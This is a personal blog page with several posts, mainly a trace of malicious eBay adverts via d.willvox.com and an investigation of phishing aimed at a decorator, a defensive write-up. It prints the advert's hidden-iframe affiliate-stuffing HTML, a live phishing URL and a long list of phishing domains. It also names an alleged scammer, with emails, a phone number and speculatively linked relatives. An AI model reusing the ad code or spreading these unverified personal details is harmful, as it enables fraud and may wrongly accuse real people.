eBay: zaful advert playing music automatically (another d.willvox.com malicious advert)

As a follow on from last month where gamiss.com was hijacking eBay pages.. this month it is zaful.com.

This time the visitors don’t get hijacked away from eBay but they do get music playing at them in the background while they are on eBay pages.

The advert causing this looks like:

The chain of requests goes as so.

You visit an item on eBay (and probably many of the other pages too).

This has, among many others, an iFrame that fetches from:

https://ir.ebaystatic.com/cr/v/c1/x-frame-4.html

Which then runs some JavaScript to show an advert:  function showAd()

This triggers a request to image3.pubmatic.com which is a legitimate advertising network. This responds with:

https://tags.mathtag.com/notify/js?exch=pub&id=REDACTED&sid=3049544&cid=5455548&nodeid=1135&price=0.08&group=eu&auctionid=2004222052992160077&bp=a_aiaaaa&3pck=REDACTED

Interesting to see the price paid in the URL! Mathtag seems to be where things go wrong (as it did last month too). Mathtag respond with some javascript that sends users onto:

https://d.willvox.com (also used in last months page hijacking).

This malicious website then responds with the advert code:

<div><a href="https://www.zaful.com/" target="_blank"><img src="https://d.willvox.com/ad/zaful.jpg" height="90" width="725"></a>
<img width="300" height="250" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&amp;af=https://ebayadvertising.co.uk/&amp;cn=3049544&amp;cv=5455548&amp;dp=5956238474928068609" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&amp;lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display: none" sandbox="allow-scripts allow-same-origin allow-top-navigation-by-user-activation"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe></div>

Job done! While trying to pollute the eBay visitor with referal code tracking for gamiss, zaful, rosegal, gearbest and aliexpress the zaful page embedded within the advert then has a further embedded youtube video that plays music!

eBay’s only response to this is blaming the user.

If you are reading this and are affected.. it isn’t you.. it is eBay (again!). Feel free to send them to this page so they can read up on their own crappy advertising ecosystem and fix it.

Advertisements

Spear Phishing against Painter Decorators

This article is a work in progress, some back in a day or so please.

Unusual one this… a painter decorator friend has been plagued by various attempts at phishing his e-mail logins over the past few months. Each time I’ve got to investigating it the “bad page” in the email link has been removed.

Today I got to one early enough to research it while the site was still active.

It starts with a full e-mail conversation that looks like a client interested in the decorators service:

The decorator responds… and then gets a reply with a supposed link to a design or work order.

This link is the phishing page.

https://zakutasinbola.info/3r69mo/bahubali.php?id=00XXX8XX

With what looks potentially like a unique id for the phishing attempt.

If the victim clicks the link they are presented with the phishing page prompting them to select their chosen login method:

And, if they fall for it, the deed is done.

However.. the person behind it didn’t do a good job of hiding who they are. The website is hosted in Russia but the domain involved with the one I investigated:

zakutasinbola.info

Registered by Saim Raza. They are, for other scams, using the email addresses “fu.d.too.l786@gmail.com”, “fu.d.tool7.86@gmail.com”, “fudtoo.l786@gmail.com”,  “fudtool786@gmail.com”, “fudtools@gmail.com”, “fud.tools@gmail.com”, “saim.raza1338@gmail.com” and “saim.raza.133.8@gmail.com” mainly using the telephone number “923241237632”.

Supposedly living in Lahore 31050 Pakistan possibly with family Rizwan, Werwer Shahzaf and Noman.. just going by a Google for the telephone number. These associations may be inaccurate.

This information sent me onto a trove of other likely phishing or malicious domains!

1869744.com
1online-activation.com
1online-activation.org
1online-reactivation.com
1online-reactivation.net
1support-technique.com
1support-technique.net
1support-technique.org
2online-activation.net
3lacmebatdone.com
9khlaovk9x.com
abhampashan.info
abhiayegawo.com
abihanirocker.com
abisuries.com
abnamro-alert.com
aboukangaz.com
abtokisikaypas.com
abtosabkadata.com
acc-bmo1-login.com
acced-desjard1-log.com
accesshelp-user.com
access-verificatiion.com
accountvalidation-services.com
accountverifynow.com
acc-secrue1.com
achasbc.com
achesbc.com
achievethem.com
achkomachko.info
achsbclog.com
acibrand.com
acoracide.com
acrotellfi.info
actidomainso.com
actuallz.tk
additiontechna.com
addonsproducts.com
adobefileshareingz.com
adobesauce.com
adobesprotct.com
adverstime.com
advisableserver.com
afabumtunpo.com
affilateservice.com
afinitycreditunion.com
agarishisabko.com
agihaitumer.info
ahlebateloop.com
ahmythsecur.com
ainakhiyand.info
aitumer.info
ajabnatyrisht.com
akhrihabhaeabm.info
alfaisalaih.com
aliancefunding.com
alibabahugia.com
alibabatred.com
alibabbaz.com
alimoladomnok.com
allgoodforno.com
allvegetablessupply.com
allvehiclepartssupply.com
almostweek.com
alorsdance.com
amdgfxclouss.info
americanhsbc.com
ameserve.com
andrjakarbol.com
angrezimain.info
anydasky.com
araboiluae.com
arabooilandgas.com
armoremsid.info
arrriyadh.com
asratgolikaw.com
assleticket.com
atbonline1.com
atharakatha.com
atratevalues.com
audia3i.com
authentisigs.pw
autonawab.com
awargithirehb.com
awaznechay.info
awlatreayhan.com
ayekhudafindorw.com
ayenetflizoa.com
ayhayu.com
azghorerinium.com
bachkrahna.com
bachpansay.com
badlakaralo.com
badnamzmana.com
badshahme.com
bakhshnanhi.com
banapastol.com
bancontact-pay.com
bandroxoma.com
bandroxxxoma.com
banigalaa.com
banking-securities.com
bankingwellssecurelogin.com
bankwithinvestec.com
banoteraswaer.com
barishkapani.info
barlessi.com
basecloudessd.com
basecoinsc.info
beacbuch.com
begumkapyar.com
beparmaishq.com
bercylesfund.com
bhagareyhum.com
bhagnews.com
bhamanihai.com
bhatiyarestor.com
bheeganimco.com
bholarecord.info
bhosabhraha.com
bilidablongra.info
bimardimagka.com
bizwalfes.com
bloshazalima.com
blueblasit.com
bm1o-sigin-logn.com
bmo1-log1n-sec.com
bmo1-mobile-online.com
bmoacaaac.com
bmo-mobile-online-update-now.com
boandamerica.com
boanewban.com
bohaytayae.com
bondpatipai.info
btanaphragr.com
btc-bh.com
bundoarvalves.com
c1bc-acc-login1.com
cablesayget.com
cakewalababa.com
camilacbila.com
canadagovcare.com
canadamobilityrefund.com
canadarevenewfix.com
canadepovd.com
cancel-subscriptionis-apple.com
canperforma.com
caranhweliyan.com
centerwaysi.com
ceo-mail.ml
chabhisovi.com
chaeslik.com
chalochalainmi.com
chalochaleinisb.com
chandmardawa.com
changigalcyar.info
chanjrandalo.com
charsetut.com
chasbardaoz.com
chaskaylartiker.info
chichongshpang.info
chintatachitata.com
chloachahuwa.com
ch-main.com
chotigandwa.com
chuthaidared.com
chutkijotum.com
citibanksibiu.com
cliendvds.com
client-collectonline.com
clnase.com
cloudcoinsc.info
cloudeprotine.com
cloudeto1mail.info
cloudevelly.info
cloud-flowss.com
cloudossione.com
clouds-server.com
codeteachna.com
cofepelayray.com
cofnirmyou.com
coinsservice.com
collect8-collect8.com
com-bz.com
come-live.tk
comensmentop.com
comiservices.com
com-v51.com
conservasprotomar.com
couptechna.com
courierd.com
courierinfos.com
courierworldson.com
credkarioy.com
cunionsuisse.com
customdnss.com
daikhnobay.info
daikhobatsunlo.com
dancealors.com
danifoss.com
dantkadard.com
dashehraeve.com
datacloude.com
datacloudeservicee.com
datanbdways.com
dataplues.com
dateshubs.com
dawatkahi.info
dc-dc7dbd92dde2.botfactorl.com
ddropss.com
deachun.com
debiaserver.com
decusigns.com
dedicatepanel.com
deesqual.com
dekhopaejan.com
delightelevat.com
deltareconz.com
demandertoola.com
demdproducts.com
des1j-accd-sign1.com
desjardins-accesd.com
desjardin-yes.com
dhamkarahe.com
dhishomang.com
dhishunmaka.com
dhokanfoot.com
dholaverayp.com
dhonbadhs.com
dhonblogs.com
dhyandiyakro.com
dilkochuraua.com
dilkortkabad.com
dillnaijanda.com
dilrubahase.com
dimpidadu.com
dinjonzbrand.com
dipb-ae.com
directbfund.com
dirpicture.com
discoveircc.com
discoverrflow.com
disputespaypal.com
dmamastklan.com
dmarc2hmt.info
dmarcserver.com
dobeint.com
docsendfiles.com
docs-filesharingpdf.com
documents-ppdf.com
domai-server.com
domcredits.com
donmains1.com
donotifes.com
dontlesroots.com
doriyanbolaygin.info
dosearrch.com
dosuitrahgye.com
dragproducts.com
dramaloirs.com
dramebazlondi.com
dreamjeerock.com
drlveoneofflce.info
droply.tk
dropmyui.com
dropvalues.com
dubaiover.com
duehelps.com
dueldomains.com
duetotaltech.com
dukhdardhis.com
easyonline-authentification.com
edertopcoma.com
edocument-online.com
egisteruy.com
ehelpsolve.com
eithescrop.com
elhoncho.com
elightelevat.com
email-automotors.com
emt-login-secure.com
emtmobilebrefunddeposit.com
emtmobilebrefunddeposits.com
emtmobiledeposit.com
emtmobilerefunddeposit.com
endonapriv.com
esihra.com
esolutionsx.com
esolvesi.com
essageply.com
etranfermobilerbadas.com
etranfermobileregozer.com
etransfer-interaconline-mobiledeposit879.com
etransfermobilityrefund.com
etransfertml.com
ewholefam.com
excelmanuals.com
exisauto.com
exisinthopes.com
existicpan.com
exitignloop.com
exitinopls.com
exitloops.com
exitngsings.com
exitomains.com
expisolution.com
extinful.com
faceboksigns.com
fash2v.com
feroiz.com
ferozpuraroad.com
feroztechn.com
ferxz.com
fidilitbonimoer.info
fido-canada-ref73639.com
fidodolarsppay.com
fidodollarslivecash.com
fidolivepay.com
filedocfex.com
filmdekhkeaye.com
financialadvisershub.com
findatroperz.com
fivvercredits.com
fleblesnames.com
flowisbest.com
forjustuplaoadd.com
fr-ca-9235.com
ftp.minukiptatera.com
fudsupport.com
gadiraphondi.com
gainmorethan.com
galaxyinvi.com
galibhiparh.com
galsecurs.com
galwaysi.com
gandabacha.com
ganduamira.com
gatajyemeran.com
geoinews.com
gesvaluesni.com
get-cryptostorm.com
getearns.com
gettradlight.com
getupandcboz.com
gharkafasana.com
gholaptrend.com
giftilicard.com
gigafasts.com
gigalinknetworks.com
gigalinkz.com
gistraproduct.com
gistugestio.com
global-entropy.com
global-query.com
gonagos.com
gonglupkay.info
gotabelomerz.com
grabupon.com
grapminrig.info
gualitynet.net
guardedcourierervices.com
gujjartele.com
gumsastele.info
h1p519atv.com
hadiqalokiope.info
hadiqokyav.com
hadseyes.com
hajikobulao.com
hallmania.com
hamzalinks.com
hanmenechaly.com
hargharbcha.com
hasclams.com
haseenpehlu.com
hashzyadahon.com
hasilorlahaslop.info
hasrtenbetab.info
hathbhinhimilaya.info
havetoback.com
hbarcclayss.com
healcra.com
hearinhavaco.com
heartofdiamondz.com
hedsquick.com
heismonefud.com
helodocus.com
helprofte.com
helptohelps.com
hemn-group.com
hibuhazard.com
hilomatyarasy.com
hipnotizedo.com
hipolos.com
hisramnobita.com
hmainconabo.com
hmaranwapho.info
hmzakinonuc.info
hndsecures.com
hojayegasab.com
holahathrakho.com
homeisproducts.com
homesidi.com
honeylofar.com
hope-good.com
hopeishope.com
hoplikes.com
hoslazulman.com
hosspices.com
hostlyk.com
host-menow.com
hostnim.com
housekep.info
hoyslenow.com
hsbc1-login-acc1.com
hsbcbenkz.com
hsbcprivateclientbankingonline.com
hsbcprivatefunds.com
hsbcredit1.com
hsbeecden.com
hsbseedot.com
hudokan.com
humnemana.info
hundabotbura.com
hundandadena.com
huwaytujuda.com
icesmitha.info
icloud-findme.info
icqonlinex.com
idharsaywahan.com
ihaitumer.info
ijachakalz.com
ikperdesidille.com
iktaramend.com
ilaechiwalichue.info
ilahisabka.com
ileshare-access.com
ileshare-securityaccess.com
imdeecol.com
inajokarthay.info
inasertibola.com
inerels.com
info1securessl.com
infobellsa.com
infoiservices.com
infordaynae.com
informations-support.com
informors.com
infosecure1sslo.com
inlowsse.info
inmomnazol.com
inquitity.com
inquritu.com
interac-etransfer-deposit-mobile879.com
interac-etransfer-mobile-deposit.com
interac-mobility.com
interaconline-etransfer-payment.com
interaconline-e-transfer-payment.com
interaconline-etransfer-telusmobility.com
interacs-access.com
interactbrand.com
interact-etransfert.com
international-card-services.com
internationtse.info
interponery.com
inthaeguzara.com
intwranstse.info
invalitrust.com
investec-bank.com
ishantgomal.com
ishqw.com
isqkibarish.info
istingcustom.com
isupport-technique.com
itnakuchyad.com
itumerihar.info
iweter3.com
ixups.com
izharkarna.com
jabkaygalatha.com
jaduterimzar.info
jaibwichonki.info
jamnoshkaro.info
janchurwa.com
janusinger.com
jariyanphrend.com
jasaykotesa.com
jaydadan.info
jeechotajana.com
jeenasikhaya.com
jehlamrover.com
jenailagayco.com
jeols.com
jidudilagi.com
jihidden.com
jimanicooz.com
jioniainbol.com
jiskajobhimal.com
jlebionwalasa.com
jobhishomw.com
joystickpo.com
jumangiback.com
jusaykangroz.com
kabhitoanaydo.com
kadorattmhari.com
kafiarsahuwa.com
kahanhogaja.com
kahanjyedil.com
kahchukayjo.com
kaisadijaray.com
kajlaraykaj.com
kalakurta.info
kaleencoridor.com
kalichran.com
kalimatarepor.com
kalkacomsatun.info
kalvmarchlac.com
kamnaikarda.info
kamralamba.com
kamwaliteszio.info
kancharust.com
kangnapawan.com
kanjaconma.com
kashifpackages.com
katepeterso.com
kerinoohchaedi.com
khabardarozma.com
khailoparnot.com
khairsanwala.com
khalikardain.com
khanbahadur.com
khulabilochra.com
khusbrats.com
khushboterin.info
khzanabox.com
kihalchalwa.info
kikrijanaopae.com
kilookpongaz.com
kinarakashi.info
kinarakashib.com
kinarakashido.com
kinasonarab.com
kinayjanabae.com
kindeljeep.com
kingsmentire.com
kinshaprera.com
kisikabhidy.com
kislihazsay.com
kitaynadarok.com
kitnasedhasa.com
kitnaydoorthay.info
klejabahraya.com
knetflixc.com
koehalnihaja.info
koformat.com
kotagekrican.com
koyetagladiater.info
krantiayegi.info
krantikobra.com
krishnacotlak.com
krishnacottag.com
krisnatoken.com
krizmaalover.com
krmowaretedc.com
kurikandijuti.com
kurimukargai.com
kurkurayoop.com
kurvars.com
kvmkvms.com
kwilliamz.com
kyatredypop.com
lakhakaidea.com
lakhpatibabo.com
lambogiboma.info
lathapyahosi.info
lathapyathya.info
lawfiirm.com
laykaruthunga.com
lbventure.co
lbventure.xyz
lcloudsecurity-lcloud.com
ledaysonya.com
legionhostes.com
lemorestorez.com
lenadensi.com
letmedothatz.com
letmesolvy.com
le-trasfer.com
lifetereyard.com
likedatbimp.com
limberconmerz.com
limcaopener.com
limecamelzre.com
linkineds.com
locatsigns.com
lockdevelop.com
locked-verify.com
lockwebs.com
logipanelsecu.com
loiesfnons.info
lokiorminthol.com
longtermzjerf.com
lookijump.com
lookpanels.com
lostofvlue.com
loyaltyindna.com
lsmeets.com
ls-pdf.com
lsrepu.com
lsuggestion.com
luckipanel.com
lwazmaatkesay.com
maapkainterv.com
maclearacuri.com
maedekolam.com
mahindrazoo.com
mahnors.com
mail.lbventure.xyz
mailbox201708.com
mailinfoe.com
mainkhlsep.info
mainybtayatha.com
maklawaayaha.com
maklawatola.com
managoseason.com
manicakolam.info
maphasyaajsae.com
maqsoid.com
marathikaraja.com
marceyonme.com
marchukaykd.com
marketer2017.com
maskvoter.com
maslayhotay.com
matchisues.com
maxprogs.com
maybank2online.com
medawindow.com
mehnatlarko.info
mehrunnisama.com
meradeejayla.com
merakyakaam.com
merakyakasor.com
merishradhcov.com
merizindagis.com
microsoftox365online.com
mightytex12.com
mightytex23.com
milaysedil.com
milletsupplysco.com
mincertinker.com
mindeze.info
minukiptatera.com
minutaytinu.com
missselfs.com
mmadaygo.com
mobile-clientservices.com
mobile-gouv.com
mobile-secureupdate.com
mobilityrefundbyetransfer.com
mobilityrefundetransferr.com
mobilityrefundetransferrm.com
mobilityrefundetransferrz.com
molbipolazm.com
monesyses.info
moqamoqas.com
moqapanelz.com
morzindgikay.com
motupalo.com
mrestse.info
mrlogisticse.com
msftservers.com
musheerkhas.com
musicoffmode.com
myaccountsecurity1.com
myclient1secure.com
myclient2.com
myclientsecure1.com
myhsbconlines.com
myvibomaniom.info
mzerstee.com
naimmataka.com
najaizsanband.com
nakoidarmyan.info
nameinfida.com
narmsabistar.com
navayansonya.com
navyfederalnewban.com
navyverifycation.com
nawesajanbna.com
nbdwayscloude.com
ndagihaitumer.info
neilbuild.com
neonsigin.com
netflexnew.com
newprotiles.com
newsafar.com
newsmocha.com
ngixnameserver.com
niesubjects.com
nigahaintaer.com
nikalyahasay.com
nikasaprobz.com
nilopamazop.com
nimlocos.com
ninahosts.com
nismjhtypagb.com
nityfederal.com
njrenewsi.com
noblesupports.com
nohidepors.com
nomeciforiou.com
nomiase.com
nomitits.com
nonehues.com
noneisuee.info
noneseudds.com
nooresaba.com
nopsis-serve.com
nosuperse.com
notifefocus.com
notiflax.com
notihiilo.com
nounemarocsealsales.com
nowexploies.com
nowlars.com
ns1.guideprods.com
ns1.ponamkiraat.com
ns2.area8475.pw
ns2.guideprods.com
ns2.ponamkiraat.com
nullserviy.com
nwboswali.com
offerid42426035.com
offerupmine.com
office3650-docsfilesharing.com
officejayakr.com
officelapls.com
officesupportapp.com
oinopoperz.com
okolaszinda.com
oldcustumz.com
omeriwajhasy.com
omlaorlasoray.com
onanukahota.com
onebreakmove.com
onedrivedomainsecurelogin.com
onedrivefileshare.com
onedrivefile-share.com
onedriveinc.info
one-driveinc.info
onedriveloginsecure.com
onedriveportal.com
onedriverv.com
onedrlveofflce.info
ongertelles.com
onlinecase321.com
online-check-id20012-apple.com
online-hsbcgoodwill.com
onlinelloydscredit.com
onlinemobileetransfercaf4gd7k.com
onlinemobilerefundbank.com
onlinemobility1.com
online-reactivation.org
onlines-access.com
online-servcenter.com
onlineservicessupport.com
online-signinvalidation.com
online-support-id0283423.com
online-support-idus90012-apple.com
online-support-idus900133-apple.com
onlinesypoi.com
opaeplastakc.info
opeecentrel.com
operatrezher.com
opooworld.com
orangesinfo.com
ordarls.com
ordarshope.com
orderthem.com
organixation.com
orpaonthay.com
ortokoecharabhi.info
osmkhanatha.info
otghumabola.info
otumerihar.info
oyeteranam.com
packiserver.com
palkainjhuki.com
panchhogye.com
pandaybaaz.com
pankhaniche.info
pankhaychalo.info
pastols.com
payment-booking-id.com
payment-intl.com
pdf-guard.com
pdfsauce.com
perlogsudhar.info
personalsupdates.com
pesamachine.info
phadlorecord.info
phirodhondtaa.com
pholsotkhaty.com
picasuminion.com
piddusyapa.com
pikachobana.com
pindoratests.com
pindropiz.com
pinsisures.com
plosecure.com
pluseoneserver.info
poilovers.com
polkacrezma.com
poltergiestz.com
polyonkalor.com
ponamkiraat.com
positiverootz.com
poxibiglez.com
premaconbaro.info
premiumrootz.com
pricewayi.com
primaxx.tk
priproneeded.com
privacy12.com
proddise.com
promteez.ga
propage12.com
prothidetion.com
pushusrexo.com
qabopertoz.com
qlandrkitean.info
quickbook-intuit.com
quickeinterac.com
rabakasicza.com
radiascosterz.com
radikarorzim.com
rakhpocket.com
ranglayadil.com
rashidmrayga.com
ratanlambyn.com
rebaonrli.com
receivesalies.com
reconnectsi.com
recoveproducts.com
redeoncloude.info
redirectisp.com
redirectjsp.com
ref11869.com
regrastamaz.com
regulaconovo.com
reidentifylogon.com
reminderteel.com
remitciti.com
remotrdcloude.info
replacingme.com
resortzmimba.com
retfopionex.com
rewals.com
ridertermzare.com
rishtaoplaman.com
rizlaphokayga.com
rizvialabyan.com
robanidarudar.com
robhrotport.com
rogers-acc1-login.com
rogerssetup.com
ronachahonto.info
rotikhalomini.info
rotipaygaiae.com
rowseproducts.com
rozphnekrna.com
rscotech.com
rushitums.com
rustampalwan.com
sabkikhairho.com
sadetinsoo.info
sahibokashma.com
sajantumsay.com
samartileryz.com
samokasangha.com
sandlinaina.com
sangyag.com
saninops.com
saphoness.com
sardariwala.info
sarikalnobay.info
sariraatjgaye.com
sariratbighne.info
saygeebusiness.com
sbcsr-us.com
scemehous.com
schohead.com
scoiservice.com
scoti1bnk-acclogin.com
secafters.com
secubmo.com
secure-active.ml
securebm21.com
secure-documents-uploads.com
secured-onlinex.com
secured-sec1chase.com
secureinfopage.com
secure-interca-seclink.com
securemyrbc.com
secure-onlinesignin.com
securesslinfo.com
secure-tangerine-enligne1.com
securetrans-interca5x7b3-en-seclink.com
secureyoues.com
securitiy-alerts.net
security-ac1c-log.com
security-acc-signin.com
secursonline.com
sedhisabacha.com
sendpicd.com
sertaaryou.com
serverstechna.com
serviceasi.com
setuoee.info
setupeat.com
setuprogers.com
severdatalinkin.com
shabnamkitarah.info
shaggygroup.com
shailatech.com
shakalakavoo.com
shakemilaha.com
shalldeprotine.com
shantipriyaz.com
sharacorepoz.com
sharamnhiati.info
sharedcont.com
sharmelabegum.info
sharmilamera.com
sharmproducts.com
shazilobiakyu.info
shdeerteslop.com
shedaksaeho.com
sheelakonabta.com
sherloperzinda.com
sheronmazy.com
shimlkapark.com
shimltaghtiran.com
shosuggest.com
showshowto.com
shuglalaomani.info
signsbaba.com
signspanel.com
simsombaz.com
sisfodacomana.info
sitehomeapsx.com
sixstringsw.com
slamzcoffins.com
smithsofts.com
smjhmainaya.com
smtpian.com
snbprivate.com
snthostis.com
sofazindabad.com
sohaibphansgya.com
sojabadi.com
sojaephruthk.com
soli892.com
solominesi.com
solovon.com
solubuzi.com
solusif.com
somethbrand.com
soniabchajo.com
soolitaytangya.com
spectrocoinss.com
ssdneting.com
sslbankingsecure.com
sslcertificats.com
sslinfosecured.com
standardbank-offshore.com
statsupfeeds.com
stopharras.com
storefrontzy.com
successfullyplans.com
successfulwebsx.com
sugarishell.com
sugestclient.com
suggesshop.com
suggessings.com
suggestsupdes.com
suggestupdtes.com
sugiturgent.com
sugneshost.com
sug-servers.com
sugs-server.com
sugtechupd.com
sultanbadcha.com
sunblust.com
sunrisepetorleum.com
suntrustfixa.com
superhinds.com
suporttechniques.com
supports-techniques.com
support-techniique.com
supporttechniqueaccounts.com
support-technique-canada.com
surioo.com
suspencekhan.com
suugestbuz.com
swalonkjwab.com
swissentrance.com
systemmyacount.com
tafredomanio.com
tagimertigoz.info
taintedrootz.com
takderkushae.com
talismjinder.com
tanuklaverop.com
taxtubein.info
teamsupporttechnique.com
team-technicail.com
teamtechnicals.com
technicalasupport.com
technical-teams.com
techniical-suppiort.com
tehrmtech.com
ter3rgcq.com
teramashup.com
terameranata.com
teraordars.com
teressanilam.com
teriferdonalo.com
terimerikahanii.com
teripalken.info
teritobegum.com
termiatorss.com
tertoizertvo.com
textflav.com
tgousanstse.info
thakkaybae.com
theghostwolf.com
thelengendd.com
thindachaha.info
thorasakhee.com
thugthief.com
tikkie-pay.com
timeisgoing.com
timenhihe.info
timestampsi.com
timhopes.info
tinkytanko.com
tinydocu.com
tiredofimpaiti.com
titokimaa.info
tmharakool.com
tmverifyonline.com
todocoleccions.com
tohaknhiwowa.com
tokhaybewja.com
toltahoes.info
tombraiderxz.com
tongacodex.com
topfob.com
toplpgroup.com
totalunpress.com
totalupdtech.com
trackfooz.com
tradeinfotechna.com
tradesminds.com
trafrproducts.com
tragiops.com
trandolz.tk
transcozomb.com
transfoffer.com
transprivpro.com
trasugestions.com
travelmarka.com
trboozlinkan.com
tredmilozona.com
trestaropriy.com
trivboonerz.com
trollkazima.com
trustbuildss.com
trustworthz.com
tuhibtadaymol.com
tujomeranam.com
tukounnai.com
tumeraheloch.com
tumerizerihar.info
tumharitarf.info
tumnatum.com
tunebaznaiana.com
turnachakwali.com
tusubkuchpawa.com
uberfath.com
ubersayjatatgo.info
ugestinfoes.com
uiicodes.com
uioplo.com
ujrachmanha.com
ulokapatha.info
uminerponam.com
ummerihar.info
umnalalobae.com
unemydemoz.com
unleashlimits.com
updaiting.com
updaitings.com
updateaccounts-verifications.com
updateacct.com
updatefilesin.com
updtechsnow.com
up-to-date-reri.com
uptoworkonline.com
uraibarusting.com
urlextrcts.com
urmilapooz.com
urmilaterisaki.com
user-access.org
usgranttreasury.com
usiunlited.com
usmainhunoperaz.com
ustadnutang.com
ustadpakragia.com
v2secure.com
v53i.com
vahelsign.com
vahkeioanku.com
valueofsuggestion.com
veilig-bankieren.com
velibathisan.info
verification-canada.com
verification-gouv.com
verification-secu.com
verifyamzn.com
vibusniess.com
viewdreamis.com
visehandlinf.com
vivahsajnaka.com
vividerenaz.com
vkpardanday.com
vootgen.com
vutml.com
vvebconnect.com
waatve.com
wachniyan.info
wadaraha.info
wadrekabeta.com
wahshiraees.com
waitisgood.com
wakhraswaig.info
wavesfateh.com
wavestomer.com
webadmin-mail-update.com
web-aolmail.com
webapp-mpp2.com
webmaster-service-update.com
webmobile-services.com
web-mobileservices.com
webshomes.com
welcomebrothe.com
well-quicktrans.com
wellsfargosecurelogin.com
welsfargodirectlink.com
wesolutionis.com
whitesecuredatas.com
whitespageis.com
wholefamoies.com
wickesunye.com
widgertropers.com
wiis3.com
wikjandaygwah.com
wincheaps.com
wishohadadi.com
wordspoo.com
worldcoueriservices.com
worldcourieriservice.com
worldcourieriservices.com
worldcouriersservice.com
worlddiplomaticcourier.com
worldpost-courier.com
worldwideexpresscargo.com
wrapitwellz.com
ww-etsy.com
www.armoremsid.info
www.chaskaylartiker.info
www.chichongshpang.info
www.cofepelayray.com
www.koyetagladiater.info
www.lambogiboma.info
www.myvibomaniom.info
www.onedriveinc.info
www.tagimertigoz.info
www-clhase.com
www-squareup.com
xelamar.com
xerolimited.com
yanderoosa.com
yarkoota.com
yarmangyasi.info
ychbmr7sk.com
yelodomain.com
yeropvinalert.com
yertomilano.com
yeubiope.com
yogartmoniak.info
youthwinger.com
yumlsi.com
zafarbularha.com
zamanjalis.com
zartashakona.com
zarurtsyza.com
zenderjalakota.info
zengolese.com
zindagikayala.com
zkatokamnoba.com

This article is a work in progress, some back in a day or so please. (Note to author: This is also at the top of the page!).

JOURNEYCALL PINGIT

Google doesn’t have much about this payment reference. So here is an article to help!

If you have applied to South West Railway / South West Trains for a Delay Repay refund on a delayed journey you will probably see the refund on your bank account as “JOURNEYCALL PINGIT”.

Journeycall are a travel payments refund management company.

My preferred method for deploying Adobe Flash Player on a domain.

I am mainly writing this for my own reference as I always forget the script.
Sadly I also can’t credit the person who wrote this script. I didn’t write it! And I can’t find the source of the script by Googling for keywords within the batch file.
A similar version of the script is here but isn’t as feature rich..

Deploying Adobe Flash is always a pain. Firefox blocks it by default now and Chrome seems very variable – works one day and doesn’t work the next.
Additionally while Adobe do provide an MSI download – it doesn’t actually seem to install when set as a Group Policy Installation item. I’ve always had to fall back to the .exe using the below batch file.

@echo off

:: NAME THE EXE WITH THE VERSION NUMBER

SET latestVersion=29.0.0.113
SET version=0

:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
echo 64-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

:32BIT
echo 32-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

:afteroscheck
:: CHECK IF FLASH AX IS INSTALLED
echo checking %key% for DisplayVersion
SET emptyTest=reg query %key% /v DisplayVersion
IF %ERRORLEVEL%==1 GOTO NOT_INSTALLED

:: CHECK IF FLASH AX IS LATEST
rem FOR /f "tokens=3 delims=	" %%# In (
rem 'reg query %key% /v DisplayVersion^|Find "REG_" 2^>Nul') Do (
rem Set "version=%%#"
rem echo Set version to %%#
rem )
rem echo Version in registry reports as %version%
rem IF %version% == %latestVersion% GOTO LATEST_VERSION

  for /f "delims=" %%i in ('reg query %key% /v DisplayVersion^|Find "REG_"') do (
    rem echo.%%i
    echo.%%i | findstr /C:%latestVersion% 1>nul
    if errorlevel 1 (
      echo not current version installed
      Set "version=notcurrent"
    ) ELSE (
      echo Already Installed
      GOTO LATEST_VERSION
    )
  )

:: SEE IF IE IS RUNNING
:IE_CHECK
TASKLIST /NH | FIND /I "iexplore.exe"
IF %ERRORLEVEL%==1 GOTO INSTALL_AX
echo.
echo.
echo Internet Explorer was detected to be running.  Adobe Flash Player installation cannot continue.
echo.
echo.
GOTO END

:NOT_INSTALLED
echo Adobe Flash Player for ActiveX not found, installing...
GOTO IE_CHECK

:INSTALL_AX
start "FlashAX" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_active_x.exe" -install
start "FlashPlugin" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_plugin.exe" -install
start "FlashChrome" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_ppapi.exe" -install
echo Completed installation of Adobe Flash Player version %latestVersion% for ActiveX.
GOTO END

:LATEST_VERSION
echo Version %latestVersion% of Adobe Flash Player for ActiveX is already installed.
GOTO END

:END

Remember to change latestVersion=29.0.0.113 to the version of Flash you are installing. Also change the path to the 3 installation files further down in the script.
Hope this helps someone!

Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

UPDATE: THE SAME JUNK STARTED PLAYING MUSIC! see the new article

Today while browsing eBay I was taken off the eBay site several times and onto “www.gamiss.com/?lkid=13368106”. I did click click or even mouse over any advert.

I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.

It looks like eBay are sending visitors to an advertising partner called “pubmatic.com” who are in turn then sending the visitor to “mathtag.com”.. who are then sending advert javascript with content referencing “d.willvox.com” and “zaful.com”

The most interesting parts of the exchange are….

pubmatic.com returning the following Javascript:

